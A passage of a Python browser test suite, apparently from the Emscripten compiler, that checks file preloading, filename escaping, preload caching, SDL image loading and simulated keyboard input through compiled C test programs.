open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
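# '%%s' in the C source below is an escaped '%s' for printf; the single '%s'
# is substituted with the escaped path by the Python '%' formatting at the
# end of the string.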
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, a literal '@' in a file name must be escaped as '@@' to avoid confusion with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
os.makedirs('assets/sub/asset1/'.replace('\\', '/'))
os.makedirs('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir('dirrey')
except OSError:
pass
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
create_test_file('src.cpp', self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
create_test_file('file.txt', '''Hello!''')
self.compile_btest(['src.cpp', '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that output files whose names contain single or double quotes are handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except OSError:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
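# test.js below uses mergeInto(LibraryManager.library, ...) to register
# checkPreloadResults() as a JS library function, which the C code above
# calls via its extern "C" declaration; it counts how many preloaded
# packages were served from the preload cache (fromCache).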
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
run_process([PYTHON, FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
os.makedirs(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs('subdirr')
os.makedirs('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed, because the required dependency file is missing.
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test that a missing file makes xhr.onload run with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl_image.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl_image.c', '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.compile_btest([
'sdl_image_jpeg.c', '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
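# The snippet injected below wraps window.close so that doReftest() (defined
# in reftest.js, emitted by self.reftest above) runs after a short delay,
# giving requestAnimationFrame callbacks time to update the canvas before
# the reference comparison.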
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, so this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates the above test, but verifies we can run outside of the btest harness)
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy (so we do proxy), but make the worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-to-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def get_async_args(self):
if self.is_wasm_backend():
return ['-s', 'ASYNCIFY']
else:
return ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1'] + self.get_async_args()
]:
print(delay, defines, async_)
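# When delay is set, the '%s' placeholders below wrap the event dispatch in
# setTimeout(..., 1) so that keydown/keyup arrive asynchronously.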
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
create_test_file('sdl_key.c', self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
self.compile_btest(['sdl_key.c', '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate sending the keypress event only when the default action of
// the prior keydown event was not prevented.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. The keypress event is sent only when the default action of
// the prior keydown event was not prevented.
sendKey(65);
// Send backspace. No keypress should be sent, since default handling
// of the keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
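# SDL text input: keypress events are dispatched on document.body from pre.js while
# Module._one() is pumped on a timer.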
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl_text.c', self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
self.compile_btest(['sdl_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
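# Synthesizes mousedown/mouseup/mousemove events at coordinates relative to the canvas
# position and checks SDL mouse handling.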
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
